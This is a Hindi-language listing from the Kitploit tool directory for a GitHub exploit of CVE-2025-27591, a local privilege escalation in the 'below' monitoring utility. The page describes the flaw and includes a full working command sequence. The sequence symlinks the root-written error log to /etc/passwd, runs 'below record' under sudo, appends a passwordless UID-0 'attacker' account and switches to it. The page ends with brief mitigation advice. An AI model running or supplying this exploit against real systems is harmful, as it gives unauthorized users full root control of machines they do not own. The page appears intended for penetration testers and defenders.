Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27591 — CVE-2025-27591 के लिए स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) शोषण, नीचे दिए गए उपयोगिता के लॉगिंग में असुरक्षित सिमलिंक (symlink) हैंडलिंग का दुरुपयोग करके रूट के रूप में मनमानी फ़ाइलों को अधिलेखित (overwrite) करता है। | Kitploit
उपकरण/GitHubGitHub/krn966/cve-2025-27591
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषण
GitHubkrn966/cve-2025-27591

CVE-2025-27591

CVE-2025-27591 के लिए स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) शोषण, नीचे दिए गए उपयोगिता के लॉगिंग में असुरक्षित सिमलिंक (symlink) हैंडलिंग का दुरुपयोग करके रूट के रूप में मनमानी फ़ाइलों को अधिलेखित (overwrite) करता है।

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27591 - असुरक्षित लॉग हैंडलिंग के माध्यम से विशेषाधिकार वृद्धि

अवलोकन

CVE-2025-27591 below उपयोगिता (पैच किए गए रिलीज़ से पहले के संस्करण) में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जो इसके लॉगिंग तंत्र के भीतर असुरक्षित प्रतीकात्मक लिंक हैंडलिंग के कारण होती है। स्थानीय पहुंच वाले हमलावर इस दोष का फायदा उठाकर रूट उपयोगकर्ता के रूप में मनमानी फ़ाइलों को अधिलेखित कर सकते हैं, जिससे पूर्ण विशेषाधिकार वृद्धि हो सकती है।

भेद्यता विवरण

below टूल प्रतीकात्मक लिंक को उचित रूप से सत्यापित किए बिना /var/log/below/ में लॉग लिखता है। किसी संवेदनशील फ़ाइल (जैसे, /etc/passwd) की ओर इशारा करते हुए एक सिमलिंक पहले से बनाकर, एक हमलावर उन्नत विशेषाधिकारों के साथ मनमानी सामग्री इंजेक्ट कर सकता है जब कमजोर प्रक्रिया sudo के तहत चलती है।

शोषण प्रदर्शन

root@kitploit:~
# जाँचें कि लॉग निर्देशिका मौजूद है या नहीं
test -d /var/log/below && ls -ld /var/log/below

# मौजूदा लॉग फ़ाइल हटाएं और एक दुर्भावनापूर्ण सिमलिंक बनाएं
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

# दुर्भावनापूर्ण passwd प्रविष्टि तैयार करें
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker

# sudo का उपयोग करके कमजोर व्यवहार ट्रिगर करें
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log

# नव निर्मित रूट-विशेषाधिकार प्राप्त उपयोगकर्ता पर स्विच करें
su attacker

प्रभाव

सफल शोषण एक स्थानीय, अन-विशेषाधिकार प्राप्त हमलावर को रूट विशेषाधिकार प्रदान करता है, जिससे पूर्ण सिस्टम समझौता संभव हो जाता है।

शमन

  • उपलब्ध होते ही विक्रेता पैच तुरंत लागू करें।
  • /var/log/below/ निर्देशिका तक पहुंच प्रतिबंधित करें।
  • प्रतीकात्मक लिंक का अनुसरण करने से बचने के लिए लिखने से पहले लॉग फ़ाइल पथों को सत्यापित करें।
टूल डाउनलोड करें